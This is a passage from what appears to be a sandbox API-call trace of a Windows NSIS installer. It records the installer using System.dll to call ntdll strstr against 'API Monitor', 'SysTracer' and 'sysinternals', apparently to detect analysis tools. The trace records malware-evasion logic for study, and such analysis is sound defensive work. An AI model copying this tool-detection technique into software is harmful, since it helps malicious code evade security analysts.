(in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrlenA (lpString="") returned 0 [0158.602] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.602] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.602] lstrlenA (lpString="") returned 0 [0158.602] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.602] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.602] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.602] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.602] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.602] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.602] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.602] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.602] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.602] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.602] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.603] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.603] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.603] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.603] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.603] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.604] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.604] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.604] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.604] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrlenA (lpString="0") returned 1 [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrlenA (lpString="0") returned 1 [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrlenA (lpString="") returned 0 [0158.605] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrlenA (lpString="3399936") returned 7 [0158.605] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.605] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.605] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrlenA (lpString="") returned 0 [0158.605] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrlenA (lpString="") returned 0 [0158.606] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrlenA (lpString="") returned 0 [0158.606] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.606] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.606] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.606] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.606] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.606] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.606] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.606] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.607] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.607] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.607] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.607] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.607] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.607] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.607] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.607] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.608] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.608] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.608] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.608] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.608] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.608] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrlenA (lpString="0") returned 1 [0158.608] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.608] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.608] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.608] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrlenA (lpString="0") returned 1 [0158.608] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrlenA (lpString="") returned 0 [0158.609] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.609] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.609] lstrlenA (lpString="3399936") returned 7 [0158.609] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.609] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.609] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.609] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.609] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.609] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.609] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrlenA (lpString="") returned 0 [0158.609] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrlenA (lpString="") returned 0 [0158.610] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrlenA (lpString="") returned 0 [0158.610] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.610] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.610] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.610] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.610] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.610] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.611] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.611] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.611] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.611] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.611] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.611] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.611] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.611] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.611] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.611] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.612] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.612] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.612] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.612] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.612] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.612] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.612] lstrlenA (lpString="0") returned 1 [0158.612] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.612] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.612] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.612] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.613] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.613] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.613] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.613] lstrlenA (lpString="0") returned 1 [0158.613] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.613] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.613] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.613] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.613] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.613] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.613] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.613] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.613] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.613] lstrlenA (lpString="3399936") returned 7 [0158.614] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.614] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.614] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.614] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.614] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.614] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.614] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.614] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.614] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 